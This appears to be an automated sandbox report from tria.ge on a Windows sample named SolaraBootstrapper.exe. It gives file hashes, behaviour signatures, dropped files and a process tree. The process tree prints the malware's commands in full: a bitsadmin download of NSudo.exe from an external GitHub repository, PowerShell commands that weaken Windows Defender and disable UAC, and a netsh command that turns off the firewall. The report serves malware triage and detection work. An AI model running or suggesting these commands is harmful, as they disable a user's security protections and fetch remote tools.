Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    10/07/2024, 12:27

General

  • Target

    SolaraBootstrapper.exe

  • Size

    715KB

  • MD5

    f76e6a62661fdf7181a0072479b2f7c7

  • SHA1

    bd4995f5d5d39931cec7bdf7872c89ca1c98b5d0

  • SHA256

    f74f54580d6be2be3245755cd960e61a29f0b0766e3eec827cb2909d6c768801

  • SHA512

    526e948cffaacaa6caa9313d28bdf8b726a40d863a6b6021482497b7c121ed830141cdcc3128d08122d9e50ab39fc4a0ff6475640ea0790c3b099ed829f310b9

  • SSDEEP

    12288:gPwNKpOkwyszkgmBaPeMpAqrepwBWP3pwdDT6ulrGQ+Sf4JRZbsGOsyr4Fzi5:gPwAkkEzkgyaPhKpNPSDT6ulGtR6eFz

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Users\Admin\AppData\Local\Temp\Solara.exe
      "C:\Users\Admin\AppData\Local\Temp\Solara.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2816
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat C:\Users\Admin\AppData\Local\Temp\Solara.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2764
        • C:\Windows\system32\cacls.exe
          "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
          4⤵
            PID:2444
          • C:\Windows\system32\wscript.exe
            wscript C:\Users\Admin\AppData\Local\Temp\tmp.vbs
            4⤵
              PID:2856
            • C:\Windows\system32\bitsadmin.exe
              bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
              4⤵
              • Download via BitsAdmin
              PID:2576
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2136
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1424
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
              4⤵
              • UAC bypass
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1508
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2872
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -PUAProtection disable"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2656
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:880
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2396
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2100
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2264
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "netsh advfirewall set allprofiles state off"
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1664
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                5⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:1352
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -command "Add-MpPreference -ExclusionExtension "Solara.exe""
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1856

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\12D5.tmp\12D6.tmp\12D7.bat

        Filesize

        3KB

        MD5

        ca8c6adbbd6da2a4a498fa35426ec982

        SHA1

        09e3d8616a6bfa8a5999324e6686139027acfb81

        SHA256

        ebb973dfe87b50bf8344ea291272ee1590f382a5735f92a56b8ef6d3d30fcf5c

        SHA512

        72520a8c8d61cd02469448c02017c2a3b039fb045358512a0a8cb8f2bd90fb46c5ac6027f88a6bab87d5ca1a96445809459ef18035bf32df246230d39d2b72b0

      • C:\Users\Admin\AppData\Local\Temp\tmp.vbs

        Filesize

        112B

        MD5

        9313d55e26ad30ddcbc046fe8013a21d

        SHA1

        a5712ce8864d7b0ca88b94c64226dfeb2221457f

        SHA256

        121ab5b57fb09d3c520a7fd6dfaa5b87844e1e8379a9635e7a737934e7e9226a

        SHA512

        77b7f3c2aca2ba61519a9fed7dbb3e7f2dd803bd566eeb9531e1ed038dff68e88c4d2f73a83e37396fd475f57dbdef55966361176dde70d1343747aca5888ba7

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        de015ba5b82c0761db0f20dfa78e1535

        SHA1

        6cddb53932f20d49aef44dd01657f0b980cdb5aa

        SHA256

        37ad9b7f9a23a02db5c4c92be82704ec52abd7fbdf7b9ce194e9a77fd3069bd7

        SHA512

        d6c69a7f7b313d7e62150a4233be291e2f62b40a5486a1c74dd301f2e80e839c3915263ca33e3aafdb50bf4c2d61ea5487d3f758794d058728ba94aab7a5efd4

      • \Users\Admin\AppData\Local\Temp\Solara.exe

        Filesize

        123KB

        MD5

        97c55dabe9a79cd79f28c956776f7419

        SHA1

        1d24c86f2c31d8a099573e57e508aead646a1fce

        SHA256

        16f593cacbe6af31b0ec10b285bed89efb1b270f6bb29ec05fc98237f0194913

        SHA512

        1d26d2bcd410bc34e3a5e20562084423a143fd1d758ce28ed7841c9a15acba4425a8790b1357f722bad7200204a199e3830e9ab21343b8d72b0f7d4e5f523e8b

      • memory/1424-26-0x000000001B780000-0x000000001BA62000-memory.dmp

        Filesize

        2.9MB

      • memory/1424-27-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

        Filesize

        32KB

      • memory/2136-18-0x000000001B550000-0x000000001B832000-memory.dmp

        Filesize

        2.9MB

      • memory/2136-19-0x0000000001F00000-0x0000000001F08000-memory.dmp

        Filesize

        32KB

      • memory/2648-0-0x0000000000400000-0x00000000004B5000-memory.dmp

        Filesize

        724KB